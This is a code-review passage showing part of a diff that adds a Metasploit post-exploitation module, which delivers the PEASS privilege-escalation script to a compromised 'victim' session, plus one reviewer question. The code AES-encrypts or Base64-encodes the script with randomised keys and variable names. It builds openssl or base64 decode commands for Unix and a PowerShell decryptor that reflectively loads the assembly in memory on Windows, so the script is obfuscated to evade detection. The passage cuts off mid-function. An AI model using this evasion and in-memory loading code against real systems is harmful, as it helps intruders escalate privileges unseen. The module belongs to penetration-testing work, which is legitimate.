modules/post/multi/gather/peass.rb

```diff
@@ -0,0 +1,396 @@
+      ]
+    )
+
+    @temp_file_path = ''
+  end
+
+  def run
+    ps_var1 = Rex::Text.rand_text_alphanumeric(5) # Winpeas PS needed variable
+
+    # Load PEASS script in memory
+    peass_script = load_peass
+    print_good('PEASS script successfully retrieved.')
+
+    # Obfuscate loaded PEASS script
+    if datastore['PASSWORD'].length > 1
+      # If no Windows, check if openssl exists
+      if !session.platform.include?('win')
+        openssl_path = cmd_exec('command -v openssl')
+        raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?('openssl')
+      end
+
+      # Get encrypted PEASS script in B64
+      print_status('Encrypting PEASS and encoding it in Base64...')
+
+      # Needed code to decrypt from unix
+      if !session.platform.include?('win')
+        aes_enc_peass_ret = aes_enc_peass(peass_script)
+        peass_script_64 = aes_enc_peass_ret['encrypted']
+        key_hex = aes_enc_peass_ret['key_hex']
+        iv_hex = aes_enc_peass_ret['iv_hex']
+        decode_linpeass_cmd = "openssl aes-256-cbc -base64 -d -K #{key_hex} -iv #{iv_hex}"
+
+      # Needed code to decrypt from Windows
+      else
+        # As the PS function is only capable of decrypting readable strings
+        # in Windows we encrypt the B64 of the binary and then load it in memory
+        # from the initial B64. Then: original -> B64 -> encrypt -> B64
+        aes_enc_peass_ret = aes_enc_peass(Base64.strict_encode64(peass_script)) # Base64 before encrypting it
+        peass_script_64 = aes_enc_peass_ret['encrypted']
+        key_b64 = aes_enc_peass_ret['key_b64']
+        iv_b64 = aes_enc_peass_ret['iv_b64']
+        load_winpeas = get_ps_aes_decr
+
+        ps_var2 = Rex::Text.rand_text_alphanumeric(6)
+        load_winpeas += "$#{ps_var2} = DecryptStringFromBytesAes \"#{key_b64}\" \"#{iv_b64}\" $#{ps_var1};"
+        load_winpeas += "$#{Rex::Text.rand_text_alphanumeric(7)} = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($#{ps_var2}));"
+      end
+
+    else
+      # If no Windows, check if base64 exists
+      if !session.platform.include?('win')
+        base64_path = cmd_exec('command -v base64')
+        raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?('base64')
+      end
+
+      # Encode PEASS script
+      print_status('Encoding PEASS in Base64...')
+      peass_script_64 = Base64.strict_encode64(peass_script)
+
+      # Needed code to decode it in Unix and Windows
+      decode_linpeass_cmd = 'base64 -d'
+      load_winpeas = "$#{Rex::Text.rand_text_alphanumeric(6)} = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($#{ps_var1}));"
+
+    end
+
+    # Write obfuscated PEASS to a local file
+    file = Tempfile.new('peass_metasploit')
+    file.write(peass_script_64)
+    file.rewind
+    @temp_file_path = file.path
+
+    if datastore['SRVHOST'] == ''
```

Comment:
Is there a circumstance where uploading via https is preferrable to simply uploading through the session?